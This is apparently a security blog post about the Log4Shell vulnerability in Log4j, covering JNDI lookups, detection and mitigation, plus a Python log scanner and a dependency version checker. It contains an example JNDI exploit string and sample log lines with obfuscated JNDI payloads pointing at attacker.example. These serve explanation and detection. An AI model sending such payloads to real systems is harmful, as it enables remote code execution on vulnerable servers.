
Log4Shell Vulnerability

Author – Abhijit Limaye

What Is It, And What Could Software Vendors and Developers Do?

3RD PARTY LIBRARIES IN THE SOFTWARE SUPPLY CHAIN CONTINUE TO POSE SECURITY RISKS FOR WEB APPS

What Is Log4j, And What Is the Vulnerability (“Log4Shell”, CVE-2021-44228)?

Log4j is a very popular and widely used Java library for logging. Most software relies on logging as a way of providing additional diagnostics, debugging, or developer support in production environments. Logging makes it easy to spot or reproduce errors or issues in production software.

What Is JNDI?

One of the major advantages of Log4j is its flexibility and extensibility, including that provided by “Lookup plugins.” Simply put, they allow the use of ‘functions’ in any part of a log message. Of particular interest here is the JNDI (Java Naming and Directory Interface) lookup. JNDI provides a way to retrieve Java objects stored in a directory service such as LDAP. One of the most common JNDI use cases is to retrieve a “connection” object that is then used to access the database backend.

How Would an Exploit Work?

Because Log4j evaluates lookups inside log messages, a specially crafted message looks something like ${jndi:ldap://my-evil-ldap-server/evilresource}. The ${} syntax instructs the Log4j library to ‘evaluate’ the expression contained within it rather than simply log it as text. The result of evaluating a JNDI lookup is that the resource pointed to by the URL is fetched and then loaded or executed on the system. This is what leads to exploitation: an attacker supplies an attacker-controlled URL carrying a malicious payload as part of user input, in the hope that the input somehow finds its way into a log entry.

[Image from the original post: https://www.ideastoimpacts.com/log4j-blog.php]

How Do You Detect This Vulnerability?

Standard vulnerability scanners can check for the presence of a vulnerable version of the library on your system. Beyond that, they cannot do much, as the vulnerability manifests through code. Unless a SAST tool scans the code, you won’t know the attack surface. Software Composition Analysis (SCA) tools let developers scan the dependencies in their code for this library. So far, the best run-time detection is achieved with DAST (Dynamic Application Security Testing) tools for web applications. Just as such tools test for SQL injection by trying to ‘inject’ SQL into user inputs, the same mechanism can be used here to ‘inject’ a crafted JNDI lookup that points at a unique URL. If that URL sees a ‘hit’, you know which part of the code is logging the crafted input.
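The log-side counterpart of the DAST approach above is to scan what actually reached your logs for JNDI lookups. The following is an added example, not code from the original post: a small Python detector that reduces nested lookups from the inside out (so a `jndi` lookup that was split across inner `${lower:...}` or `${...:-x}` lookups still resolves to one recognisable token) and reports the lookup target per line. The sample access-log lines, host names and paths are constructed for the demonstration, and the reduction rules are a detection heuristic, not Log4j’s real interpolator.

```python
import re

# Matches an innermost "${...}" lookup: a body containing no further "{" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# Sentinel that replaces a resolved JNDI lookup; it contains no "${" or "}",
# so the reduction loop below always terminates.
_MARK_OPEN, _MARK_CLOSE = "<<JNDI:", ">>"


def normalize_lookups(text: str, max_rounds: int = 50) -> str:
    """Reduce nested lookups from the inside out so a JNDI lookup assembled
    from several inner lookups becomes one token.

    Detection heuristic only (not Log4j's Interpolator): it models the
    lower/upper lookups and the "${name:-default}" fallback syntax, marks
    "jndi" lookups, and reduces any other lookup to its body text.
    """

    def reduce_one(match: re.Match) -> str:
        body = match.group(1)
        name, _, arg = body.partition(":")
        lname = name.strip().lower()
        if lname == "jndi":
            return _MARK_OPEN + arg.strip() + _MARK_CLOSE
        if ":-" in body:                      # ${unknown:-default} -> default
            return body.split(":-", 1)[1]
        if lname == "lower":
            return arg.lower()
        if lname == "upper":
            return arg.upper()
        return body                           # unknown lookup: keep as text

    for _ in range(max_rounds):
        reduced = _INNER_LOOKUP.sub(reduce_one, text)
        if reduced == text:
            break
        text = reduced
    return text


def find_jndi_lookups(text: str) -> list[str]:
    """Return the JNDI targets (e.g. 'ldap://host/path') found in one string."""
    normalized = normalize_lookups(text)
    pattern = re.escape(_MARK_OPEN) + r"(.*?)" + re.escape(_MARK_CLOSE)
    return re.findall(pattern, normalized)


def scan_lines(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (1-based line number, JNDI targets) for each line carrying a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        targets = find_jndi_lookups(line)
        if targets:
            hits.append((number, targets))
    return hits


# Constructed sample access-log lines (addresses, hosts and paths are made up).
SAMPLE_LINES = [
    '10.0.0.5 "GET /search?q=shoes HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.11 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.12 "GET /price?amt=${total} HTTP/1.1" 200 "curl/7.79"',
]

if __name__ == "__main__":
    for number, targets in scan_lines(SAMPLE_LINES):
        print(f"line {number}: JNDI lookup -> {targets}")
```

Run it over decoded text: if the input is a raw request log, URL-decode the line first (a `%24%7B` in a query string is `${` by the time the application logs it). The last sample line shows why the reduction step matters in the other direction too: a benign `${total}` in a URL is not flagged, so the check does not drown you in false positives.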

Mitigation:

Needless to say, you can’t recommend that everyone stop using Log4j overnight, as that is almost impossible. Log4j also comes bundled with other software packages, which makes it even more difficult to identify and remove.

Here are some recommended mitigations for developers and software vendors.

For Developers:

  1. Logging is spread across your entire code. Scan your entire codebase to see where log strings are formed using any user input or stored data.
  2. If there is a need to log user input, sanitize it so that it does not include ‘commands’ that trigger vulnerabilities.
  3. Update your version of the log4j library with the patch release from Apache (https://logging.apache.org/log4j/2.x/security.html).
  4. Use the log4j flag “formatMsgNoLookups=True” to stop code execution; however, doubts remain whether that is sufficient.
  5. A good practice in general is to perform security scanning of code and Software Composition Analysis scans to identify vulnerable 3rd party libraries.
  6. Implement a regular process that checks for and updates third-party libraries.
  7. Implement DevSecOps processes and make code and application security scanning part of your DevOps processes.
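Items 3, 5 and 6 above amount to one recurring question: which log4j-core versions are declared or deployed, and are they older than the fixed release? The following is an added example, not code from the original post or from Apache: a Python check that reads log4j-core versions out of a Maven pom.xml (resolving `${property}` references) and out of JAR file names on disk, and flags any 2.x version older than 2.17.0, the release the post’s update names. The sample pom.xml and file paths are constructed; the version-parsing rules are an assumption that covers ordinary `major.minor.patch` strings and truncates pre-release suffixes.

```python
import re
import xml.etree.ElementTree as ET

# 2.17.0 is the release the post's update names as fixing the follow-on DoS
# (CVE-2021-45105); anything older on the 2.x line needs updating.
FIXED_VERSION = (2, 17, 0)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")
_JAR_RE = re.compile(r"log4j-core-(\d+\.\d+(?:\.\d+)?[^/\\]*)\.jar$")


def parse_version(version: str):
    """Return (major, minor, patch), or None if the string is not a version.
    Pre-release suffixes such as '2.0-beta9' are truncated to (2, 0, 0)."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def needs_update(version: str) -> bool:
    """True for any Log4j 2.x release older than FIXED_VERSION.
    Unparseable versions are flagged so a human reviews them. Log4j 1.x is
    not affected by these two CVEs (it is end-of-life and has its own
    issues, which are outside this check)."""
    parsed = parse_version(version)
    if parsed is None:
        return True
    return parsed[0] == 2 and parsed < FIXED_VERSION


def _local(tag: str) -> str:
    """Strip the Maven XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def log4j_core_versions_from_pom(pom_xml: str) -> list[str]:
    """Return every declared log4j-core version, resolving ${property} refs."""
    root = ET.fromstring(pom_xml)
    properties = {}
    for elem in root.iter():
        if _local(elem.tag) == "properties":
            for prop in elem:
                properties[_local(prop.tag)] = (prop.text or "").strip()
    versions = []
    for dep in root.iter():
        if _local(dep.tag) != "dependency":
            continue
        fields = {_local(child.tag): (child.text or "").strip() for child in dep}
        if (fields.get("groupId") == "org.apache.logging.log4j"
                and fields.get("artifactId") == "log4j-core"):
            version = fields.get("version", "")
            ref = re.fullmatch(r"\$\{([^}]+)\}", version)
            if ref:
                version = properties.get(ref.group(1), version)
            versions.append(version)
    return versions


def log4j_core_version_from_path(path: str):
    """Return the version embedded in a log4j-core JAR file name, else None."""
    m = _JAR_RE.search(path)
    return m.group(1) if m else None


def assess(pom_xml: str, jar_paths: list[str]) -> list[tuple[str, str, bool]]:
    """(where found, version, needs_update) for every log4j-core located."""
    findings = [("pom.xml", v, needs_update(v))
                for v in log4j_core_versions_from_pom(pom_xml)]
    for path in jar_paths:
        version = log4j_core_version_from_path(path)
        if version is not None:
            findings.append((path, version, needs_update(version)))
    return findings


# Constructed sample inputs: a pom.xml that pins log4j-core through a
# property, and a few JAR paths as a deployment scan might list them.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <properties>
    <log4j.version>2.14.1</log4j.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j.version}</version>
    </dependency>
    <dependency>
      <groupId>com.fasterxml.jackson.core</groupId>
      <artifactId>jackson-databind</artifactId>
      <version>2.13.0</version>
    </dependency>
  </dependencies>
</project>
"""
SAMPLE_JARS = [
    "/opt/app/lib/log4j-core-2.16.0.jar",
    "/opt/app/lib/log4j-api-2.17.0.jar",
    "/opt/legacy/lib/log4j-core-2.17.0.jar",
    "/opt/legacy/lib/commons-io-2.11.0.jar",
]

if __name__ == "__main__":
    for where, version, flagged in assess(SAMPLE_POM, SAMPLE_JARS):
        print(f"{where}: log4j-core {version} -> {'UPDATE' if flagged else 'ok'}")
```

A check like this belongs in the regular dependency-review process the list calls for, not a one-off: the pom.xml answers what you build, the JAR scan answers what is actually deployed, and the two routinely disagree when log4j arrives bundled inside another package.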

For Software Vendors

  1. Have a well-defined Open-Source Review process for approving the use of any 3rd party open-source library before developers start using it in their code.
  2. Secure by Design approach: security issues in code and products can no longer be an afterthought. Sensitize engineering and product teams to security issues, conduct regular security training, implement Secure Software Development, and introduce DevSecOps processes.
  3. Invest in tools for static and dynamic testing (SAST, DAST) and Software Composition Analysis that can uncover vulnerabilities hidden in 3rd party libraries.

In Summary

Cybersecurity is no longer a technology risk but a business imperative! No vulnerability can be taken lightly, and the Log4j vulnerability just elevates the challenge further. No one is immune to the risk posed. For organizations, it is literally a question of “when,” not “if,” they will get hacked. The key takeaways are implementing robust cybersecurity programs that include Secure Development, Vulnerability Management and Risk Analysis Programs, and most importantly Patching! Be a Cyber Security Champion and Stay Safe!

Update #1:

As we were getting ready to publish this blog post, another vulnerability in log4j hit the mainstream. This one is in the version of Log4j that Apache released to fix the earlier Log4Shell vulnerability. It (CVE-2021-45105) can be exploited by attackers to cause a Denial-of-Service by using a crafted log message payload that relies on ‘recursive lookups’. Apache has released version 2.17.0 to patch the newly disclosed vulnerability. We reiterate our message of taking cyber risk very seriously and implementing robust cyber security programs in the organization!

Copyright©2024 ideas to impacts. All rights reserved.